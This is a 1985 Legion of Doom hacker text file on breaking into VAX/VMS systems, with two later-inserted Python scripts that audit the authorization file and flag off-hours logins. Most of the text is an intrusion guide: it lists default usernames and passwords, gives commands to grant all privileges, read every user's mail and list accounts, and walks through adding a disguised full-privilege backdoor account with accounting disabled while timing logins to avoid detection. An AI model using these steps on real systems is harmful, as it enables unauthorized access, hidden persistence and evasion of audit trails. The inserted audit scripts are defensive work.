Lex Luthor and The Legion Of Doom/Hackers Present:               

       HACKING VAX'S VMS  Part I                  

    This file will list most default accounts/passwords,  commands 
for non-privileged accts and commands for privileged accounts, how
to set up your own acct, list users and how to shut down the system. 
                                   
  (C)    WRITTEN 10-APR-85         
  Written by:  LOD/H               


INTRODUCTION:
-------------

   The VAX is made by DEC (Digital Equipment Corp) and can run
a variety of operating systems.  In this file, I will talk about
VMS (Virtual Memory Operating System). The VAX is a 32-bit
machine with a 32-bit virtual address space.

ENTRANCE:
---------

   When you first connect with a VAX you type either a return, a
ctrl-c, or a ctrl-y.  It will then respond with something
similar to:

   LOD/H NETWORK COMMUNICATIONS RESEARCH SYSTEM VMS V4.0

   Username:
   Password:

   The most frequent way of gaining access to a computer system
is by using a 'default' login/password. In this example you may
try LOD as the username and RESEARCH as the password, or a
combination of words in the opening banner (if there is one),
which may allow you access. Otherwise you will have to try the
DEFAULT METHOD of entry.  The version listed above (V4.0) is the
latest version of VMS to my knowledge.  The more widely used
version that I have seen is V3.7.

   When DEC sells a VAX/VMS, the system comes equipped with 4
accounts which are:

   DEFAULT -- This serves as a template in creating user records
in the UAF  (User Authorization  File). A new user record is
assigned the values of the DEFAULT record except where the
system manager changes those values.  The DEFAULT record can be
modified but cannot be deleted from the UAF.

   SYSTEM  --  Provides a means for the system manager to log in
with full privileges. The SYSTEM record can be modified but
cannot be deleted from the UAF.

   FIELD -- Permits DIGITAL field service personnel to check out
a new system.  The FIELD record can be deleted once the system
is installed.

   SYSTEST -- Provides an appropriate environment for running
the User Environment Test Package (UETP). The SYSTEST record can
be deleted once the system is installed.

   Usually the SYSTEM MANAGER adds, deletes, and modifies these
records which are in the UAF when the system arrives, thus,
eliminating the default passwords, but this is not true in all
cases.

   The 'default' passwords that I have found to get me into a
system are:

   Username:    Password:
   ---------    ---------
    SYSTEM       MANAGER or OPERATOR
    FIELD        SERVICE or TEST
    DEFAULT      USER or DEFAULT
    SYSTEST      UETP or SYSTEST

   Other typical VMS accounts are:

       VAX          VAX
       VMS          VMS
       DCL          DCL
       DEMO         DEMO
       TEST         TEST
       HELP         HELP
       NEWS         NEWS
       GUEST        GUEST
       GAMES        GAMES
       DECNET       DECNET

   Or a combination of the various usernames and passwords. If
none of these get you in, then you should move on to the next
system unless you have a way to get usernames/passwords, like
from trashing, stealing passwords directly, or  by some other
means.

YOU'RE IN!
----------

   You will know that you are in by receiving the prompt of a
dollar sign '$'. You will be popped into the default directory,
which depends on what account you are logged in as.  If you
get in as the system manager, you have full access. If you get in
on the field or systest accounts, you may or may not have full
access, but you will have the privileges to give yourself full
access. To give privs to yourself:

   $ SET PROCESS /PRIVS=ALL

   Once you have full privs, you can access any directory and
any file, and also run the AUTHORIZE pgm which will be
explained.

   The VMS system has full help files available by typing HELP.
You can use  the wildcard character of an '*' to list out info
on every command:

   $ HELP *

   When you first logon, it may be to your advantage to get a
list of all users currently logged onto the system if there are
any at all.  You can do this by:

   $ SHOW USERS

   VAX/VMS Interactive Users - Total = 4
   01-MAY-1985 11:37:21.73

   OPA0:         DEMO         004C004C
   TTD2:         LAWRENCL     0059004A
   TXB1:         FIELD        008D004E
   TXB3:         TWYLYSYS     01190057

   It is highly recommended that if you are logged on in the day
and there are people logged in, especially the system manager or
the account you are logged on as, logout and call back later. I
have found that no matter what system you are on, the best way
to remain undetected is to call when no one is on the system.
You do not want to call too late since the system keeps a record
of when each user logs in and out.

   To communicate with other users or other hackers that you are
on the system with, use the PHONE Utility.

   $ PHONE Username

   If the system has DEC-net, you can see what available nodes
there are by:

   $ SHOW NETWORK

   If you have mail the system will tell you so after logging
in, simply type:

   $ MAIL

   This will invoke the Personal Mail Utility, you can use help
from there.

   There are a lot of commands and many are not too useful, (to
the hacker anyway), so I will not go into detail.  One thing
about VMS, there is plenty of on-line help available which will
enable you to learn the operating system fairly well.

DIRECTORIES:
------------

   To see what you have in your directory type:

   $ DIR

   To get a list of directories on the system type:

   $ DIR <*.*>

   When a VAX/VMS is first installed,  it comes with nine
directories which are not listed when you execute the DIR <*.*>
command:

   <SYSLIB>
   This directory contains various macro and object libraries.

   <SYSMSG>
   This directory contains system message files.

   <SYSMGR>
   This directory contains files used in managing the operating system.

   <SYSHLP>
   This directory contains text files and help libraries for the
   HELP utility.

   <SYSERR>
   This is the directory for the error log file (ERRLOG.SYS).

   <SYSTEST>
   This directory contains files used in testing the functions
   of the operating system.

   <SYSMAINT>
   This directory contains system diagnostic programs.

   <SYSUPD>
   This directory contains files used in applying system updates.

   <SYSUPD.EXAMPLES>
   This directory contains sample driver programs, user-written
   system services, and other source programs.

   <SYSEXE>
   This directory contains the executable images of most of the
   functions of the operating system.

   Inside these directories are files with the following file-types:

   File-type ! Description:     ! Command:
   ----------+------------------+-------------------------
    .txt     ! Ascii text file  ! TYPE file-name
    .hlp     ! System Help file ! TYPE file-name
    .dat     ! Data file        ! TYPE file-name
    .msg     ! Message file     ! TYPE file-name
    .doc     ! Documentation    ! TYPE file-name
    .log     ! Log file         ! TYPE file-name
    .err     ! Error msg file   ! TYPE file-name
    .seq     ! Sequential file  ! TYPE file-name
    .sys     ! System file      ! FILE-NAME
    .exe     ! Executable file  ! FILE-NAME
    .com     ! Command file     ! COMMAND NAME
    .bas     ! Basic file       ! RUN file-name
   ----------+------------------+------------------------

   There are others but you won't see them as much as the above.
You can change directories either by using the CHANGE command or
by using the SET  DEFAULT command:

   $ CHANGE <DIR.NAM>
            or
   $ SET DEFAULT <DIR.NAM>

   You can now list and execute the files in this directory
without first typing the directory name followed by the file
name as long as you have sufficient access.  If you don't have
sufficient access you can still view files within directories
that you cannot default to by:

   $ TYPE <LOD.DIR>LOD.MAI;1

   This will list the contents of the file LOD.MAI;1 in the
directory of <LOD.DIR>.

   The use of wildcards is very helpful when you desire to view
all the mail or something on a system.  To list out all the
users' mail, if you have access, type:

   $ TYPE <*.*>*.MAI;*

   As you may notice mail files have the extension of MAI at the
end.  The ;1 or ;2 etc. are used to number files with the same
name.

PRIVILEGES:
-----------

   Privileges fall into seven categories according to the damage
that the user possessing them could cause the system:

   None   - No privileges
   Normal - Minimum privileges to effectively use the system
   Group  - Potential to interfere with members of the same group
   Devour - Potential to devour noncritical system-wide resources
   System - Potential to interfere with normal system operation
   File   - Potential to compromise file security
   All    - Potential to control the system (hehe)

THE UAF
-------

   The User Authorization File contains the names of users who
may log into the system and also contains a record of the user's
privileges. Each record in the  UAF includes the following:

   1. Name and Password

   2. User Identification Code (UIC) -- Identifies a user by a
group number and a  member number.  

   3. Default file specification -- Has the default device and
directory names for file access.  

   4. Login command file -- Names a command procedure to be
executed automatically at login time.

   5. Login flags -- Allows the system manager to inhibit the
use of the CTRL-Y function, and lock user passwords.  

   6.  Priority -- Specifies the base priority of the process
created by the user at login time.  

   7. Resources -- Limits the system resources the user may
use.

   8. Privileges -- Limits activities the user may perform.

   If you have SYSTEM MANAGER privileges, you will be able to
add, delete, and modify records in the UAF.

   The AUTHORIZE Utility allows you to modify the information in
the UAF.  It is usually found in the <SYSEXE> directory.  The
commands for AUTHORIZE are: 

ADD username <qualifier..>  Adds a record to the UAF

EXIT (or CTRL-Z)            Returns you to command level

HELP                        Lists the AUTHORIZE commands

LIST <userspec> </FULL>     Creates a listing file of UAF
                            records

MODIFY username             Modifies a record 

REMOVE username             Deletes a record

SHOW                        Displays UAF records

   The most useful besides ADD is the SHOW command.  SHOW
displays reports for selected UAF records.  You can get a /BRIEF
listing or a /FULL listing.  But before you do that, you may
want to make sure no one is logged on besides you. And to make
sure no one can log on, you do this by:

   $ SET LOGINS /INTERACTIVE=0

   This establishes the maximum number of users able to log in
to the system. This command does not affect users currently
logged on.  I never do the above since it is not really needed
and looks very suspicious.  Now, to list out the userfile do the
following:

   $ SET DEFAULT <SYSEXE>
   $ RUN AUTHORIZE
   UAF> SHOW * /BRIEF

Owner          Username  UIC       Acct  Privs  Pri Default Dir.

SYSTEM MANAGER  SYSTEM  <001,004>  SYSTEM  All    4 SYS$SYSROOT:
FIELD SERVICE   FIELD   <001,010>  FIELD   All    4 SYS$SYSROOT:

   To get a full report:

   (if you used the SET DEFAULT cmd earlier and the default dir
is the <SYSEXE> directory, then you don't have to re-type it).

   $ RUN AUTHORIZE (or if you still have the UAF> prompt):

   UAF> SHOW * /FULL

   Username:  SYSTEM             Owner:  SYSTEM MANGER
   Account:   SYSTEM             UIC:    <001,004>
   CLI:       DCL                LGICMD:
   Default Device: SYS$ROOT:
   Default Directory: <SYSMGR>
   Login Flags:
   Primary days:   Mon Tue Wed Thu Fri
   Secondary days:                     Sat Sun
   No hourly restrictions
   PRIO:     4  BYTLM:         20480  BIOLM:            12
   PRCLM:   10  PBYTLM:            0  DIOLM:            12
   ASTLM:   20  WSDEFAULT:       150  FILLM:            20
   ENQLM:   20  WSQUOTA:         350  SHRFILLM:          0
   TQELM:   20  WSECTENT:       1024  CPU:        no limit
   MAXJOBS:  0  MAXACCTJOBS:       0  PGFLQUOTA:    200000
   Privileges:
   CMKRNL CMEXEC SYSNAM GRPNAM ALLSPOOL DETACH DIAGNOSE LOG-IO
   GROUP ACNT PRMCEB
   PRMMBX PSWAPM ALTPRI SETPRV TMPMBX WORLD OPER EXQUOTA NETMBX
   VOLPRO PHY-IO
   BUGCHK PRMGBL SYSGBL MOUNT  PFNMAP SHMEM SYSPRV SYSCLK

   UAF>

   Unfortunately, you cannot get a listing of passwords, though
you can get the list of users as shown above.  The passwords are
encrypted just like a UNIX system, but you cannot even see the
encrypted password unless you look at the actual file that the
UAF> draws its information from.

   After listing out all the users, you figure that since all
these other people are on here, why can't I have my own account?
Well, if you have sufficient privs, you can!

   UAF>ADD SYSLOG /PASSWORD=LEGION /UIC=<014,006> /CPUTIME=0 /DEVICE=SYS$SYSROOT-
   -/ACCOUNT=VMS /DIRECTORY=<SYSERR> /PRIVS=ALL /OWNER=DIGITAL /NOACCOUNTING

1) You ADD the username SYSLOG (you do not want to create a
user like: Lex, since it will be too obvious and not look
right).  I have had much success in not being detected with this
acct.

2) You specify the password for the SYSLOG account.

3) You assign a UIC (User Ident Code) which consists of two
numbers in the range of 0 through 377, separated by a comma and
enclosed in brackets.  The system assigns a UIC to a detached
process created for the user at login time.  User processes pass
on this UIC to any subprocesses they create. Processes can
further assign UICs to files, mailboxes, devices, etc.  You can
assign the same UIC to more than 1 user.

4) CPUTIME is in delta format, 0 means INFINITE, which is what
we will use.

5) You specify the DEVICE that is allocated to the user when
they login, which, for our purposes, is the SYS$SYSROOT device.
Other devices are: SYS$DEVICE, SYS$SYSDISK, DB1, etc.

6) Specifying an account is not necessary, but if you do, use
one that is listed as another user's, since you don't want to
attract too much attention to the account.

7) The default directory can be a directory currently on the
system or it can be created after the UAF record is added.  You
may want to use one of the ones  mentioned earlier in the file,
but be sure not to use the <SYSMGR> directory.

8) You can select one of the privileges listed earlier in this
file, we will use, of course, ALL.

9) OWNER is similar to the ACCOUNT qualifier, again, look at
what the other users have listed.

10) NOACCOUNTING will disable system accounting records, thus,
not adding information to the ACCOUNTING.DAT file.

  After the UAF record is successfully added, you should create
a directory by specifying the device name, directory name, and
UIC of the UAF record. Protection for the 'ordinary' user is
normally, Read, Write, Execute, and Delete access for system,
owner, and group processes, and read and execute access for
world processes.  To create a directory:

  $ CREATE SYS$SYSROOT:<SYSLOG> /DIRECTORY /OWNER_UIC=<014,006>
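
   Seen from the system manager's side, the /BRIEF listing shown
earlier is also the quickest audit for everything this section
describes. The following is an added example (not part of the
original file), in Python: it parses rows in the column layout
shown above and flags factory accounts, full-privilege accounts
outside an approved list, and accounts that default into a
system directory. The SYSLOG and LAWRENCL rows, the way a
directory is rendered in the last column, and the APPROVED_ALL
list are constructed assumptions.

```python
import re

# Layout of one "UAF> SHOW * /BRIEF" row as printed on this page; the owner
# field may contain spaces, so the bracketed UIC is used as the anchor.
ROW = re.compile(
    r"^\s*(?P<owner>.+?)\s+(?P<user>\S+)\s+<(?P<group>[0-7]{1,3}),(?P<member>[0-7]{1,3})>"
    r"\s+(?P<acct>\S+)\s+(?P<privs>\S+)\s+(?P<pri>\d+)\s+(?P<dir>\S+)\s*$")

REMOVABLE = {"FIELD", "SYSTEST"}    # page: may be deleted once installed
PERMANENT = {"SYSTEM", "DEFAULT"}   # page: cannot be deleted from the UAF
SYSTEM_DIRS = {"SYSLIB", "SYSMSG", "SYSMGR", "SYSHLP", "SYSERR", "SYSTEST",
               "SYSMAINT", "SYSUPD", "SYSEXE"}
APPROVED_ALL = {"SYSTEM"}           # assumption: site list of full-privilege accounts

# First two rows are from the page; the last two are constructed for the example.
SAMPLE = """\
Owner          Username  UIC       Acct  Privs  Pri Default Dir.

SYSTEM MANAGER  SYSTEM  <001,004>  SYSTEM  All    4 SYS$SYSROOT:
FIELD SERVICE   FIELD   <001,010>  FIELD   All    4 SYS$SYSROOT:
DIGITAL         SYSLOG  <014,006>  VMS     All    4 SYS$SYSROOT:<SYSERR>
L LAWRENCE      LAWRENCL <200,012> ENG     Normal 4 DB1:<LAWRENCL>
"""

def audit(listing):
    """Return (username, finding) pairs for every recognised row."""
    findings = []
    for line in listing.splitlines():
        m = ROW.match(line)
        if not m:
            continue                    # header, blank or unrecognised line
        user = m["user"].upper()
        if user in REMOVABLE:
            findings.append((user, "factory account still present"))
        elif user in PERMANENT:
            findings.append((user, "factory account: confirm password was changed"))
        if m["privs"].upper() == "ALL" and user not in APPROVED_ALL:
            findings.append((user, "ALL privileges outside approved list"))
        d = re.search(r"<([^>.]+)", m["dir"])
        if d and d[1].upper() in SYSTEM_DIRS and user not in REMOVABLE | PERMANENT:
            findings.append((user, "default directory is system directory " + d[1].upper()))
    return findings

if __name__ == "__main__":
    for user, finding in audit(SAMPLE):
        print(f"{user:10} {finding}")
```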


ACCOUNTING:
-----------

   For accounting purposes, the VAX/VMS system keeps records of
the use of the system resources.  These records are kept in the
accounting log file:

   SYS$SYSDISK:<SYSMGR>ACCOUNTING.DAT, which is updated each
time an accountable process terminates, each time a print job is
completed and each time a login failure occurs.  In addition,
users can send messages to be inserted into the accounting log
file.

   To suppress the accounting function and thus avoid accounting
for the use of system resources requires privilege.  The
/NOACCOUNTING qualifier is used to disable all accounting in a
created process.

   You may want to see how often the account you are using or
another account logs in. You can do this by:

   $ ACCOUNTING /USER=(SYSLOG)

Date / Time          Type     Subtype    Username  ID     Source
----------------------------------------------------------------
30-JAN-1985 00:20:56 PROCESS INTERACTIVE SYSLOG  000000C5 NONE  
12-FEB-1985 04:11:34 PROCESS INTERACTIVE SYSLO   000000A9 NONE  
01-MAY-1985 10:40:22 PROCESS INTERACTIVE SYSLOG  000000C4 NONE  

   This is the accounting information for the user SYSLOG, which
shows that the user has logged on three times so far.  Some
users may be on hundreds of times, thus, it would be an ideal
account to use/abuse since it will not be likely that the
unauthorized accesses will be detected.
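
   The same listing is what a system manager reviews to catch
that kind of use. The following is an added example (not part of
the original file), in Python: it parses rows in the ACCOUNTING
layout shown above and reports interactive sessions stamped
outside working time. The two LAWRENCL rows and the 08:00-17:59
working hours are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime

MONTHS = {m: i for i, m in enumerate(
    "JAN FEB MAR APR MAY JUN JUL AUG SEP OCT NOV DEC".split(), start=1)}
WORK_DAYS = range(0, 5)     # Mon-Fri, the "Primary days" in the /FULL record
WORK_HOURS = range(8, 18)   # assumption: site working hours 08:00-17:59

# First three rows are from the page; the LAWRENCL rows are constructed.
SAMPLE = """\
Date / Time          Type     Subtype    Username  ID     Source
----------------------------------------------------------------
30-JAN-1985 00:20:56 PROCESS INTERACTIVE SYSLOG  000000C5 NONE
12-FEB-1985 04:11:34 PROCESS INTERACTIVE SYSLO   000000A9 NONE
01-MAY-1985 10:40:22 PROCESS INTERACTIVE SYSLOG  000000C4 NONE
02-MAY-1985 09:15:03 PROCESS INTERACTIVE LAWRENCL 000000D0 NONE
04-MAY-1985 14:02:10 PROCESS INTERACTIVE LAWRENCL 000000D1 NONE
"""

def parse_record(line):
    """Return (timestamp, type, subtype, username), or None for other lines."""
    parts = line.split()
    if len(parts) < 6 or parts[0].count("-") != 2:
        return None                      # header, rule or blank line
    try:
        day, mon, year = parts[0].split("-")
        h, m, s = (int(x) for x in parts[1].split(":"))
        ts = datetime(int(year), MONTHS[mon.upper()], int(day), h, m, s)
    except (KeyError, ValueError):
        return None                      # malformed date or time field
    return ts, parts[2], parts[3], parts[4]

def off_hours_logins(listing):
    """Map username -> timestamps of interactive records outside working time."""
    hits = defaultdict(list)
    for line in listing.splitlines():
        rec = parse_record(line)
        if rec is None:
            continue
        ts, rtype, subtype, user = rec
        if (rtype, subtype) != ("PROCESS", "INTERACTIVE"):
            continue
        if ts.weekday() not in WORK_DAYS or ts.hour not in WORK_HOURS:
            hits[user].append(ts)
    return dict(hits)

if __name__ == "__main__":
    for user, stamps in off_hours_logins(SAMPLE).items():
        print(user, [t.strftime("%a %d-%b-%Y %H:%M") for t in stamps])
```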

LOGGING OFF:
------------

   Simply type:

   $ LOGOUT

   The system will display the usual CPU time used and other
statistics.

SHUTTING DOWN THE SYSTEM:
-------------------------

   Many files I have read tell you how to destroy a system, shut
it down etc.  I do not recommend nor practice any type of
malicious activities.  Though, I do realize that in the process
of gaining access to a system, the Hacker or System Cracker,
whichever you prefer, gets bored or learns as much as he wants
to learn about the system.  I will explain how to shutdown the
system correctly, this can be used in case you think you screwed
the system and shutting down the system may be the only way to
avoid considerable damage.

   The normal reasons for shutting down the system are: danger
of power loss, need to backup the system disk, hardware or
software problems, or to use the system for a specific
application.  Below is the command procedure which describes how
to shut down the system in an orderly fashion.  This procedure
is contained in a command file.

   PROCEDURE:

   1) Type the following command to begin the shutdown procedure:

   $ @SYS$SYSTEM:SHUTDOWN

   2) Enter time till shutdown:

   How many minutes until shutdown?:5

   3) You will now have to give the reason for shutting it down:

   Reason?:possible system damage

   4) Respond by typing a Y or N to the following question:

   Do you want to spin down the disks?:N

   After a short period the following message appears:

   SYSTEM SHUTDOWN COMPLETE - USE CONSOLE TO HALT SYSTEM

   At this point, the system cannot be totally shut down, but
all processes are halted, thus, not causing any further damage
to the system. (remember the reason you should have shut it down
was because potential damage to the system could have occurred
and you were acting in the best interest of the system) yeah
sure.

READING MATERIAL:
-----------------

   For general background information about the VAX/VMS system,
see the VAX/VMS Primer and the VAX/VMS Summary Description and
Glossary.  The following VAX/VMS documents may also be useful:

   o VAX/VMS Command Language User's Guide
   o VAX/VMS Guide to Using Command Procedures
   o VAX/VMS Release notes
   o VAX-11  RSX-11M User's Guide
   o VAX-11  Software Installation Guide
   o VAX/VMS System Manager's Guide
   o VAX/VMS System Messages and Recovery Procedures Manual
   o VAX-11  Utilities Reference Manual
   o RMS-11  User's Guide

   For controlling network operations, refer to the DECNET-VAX
System Manager's Guide.

    Lex Luthor
    Legion Of Hackers!
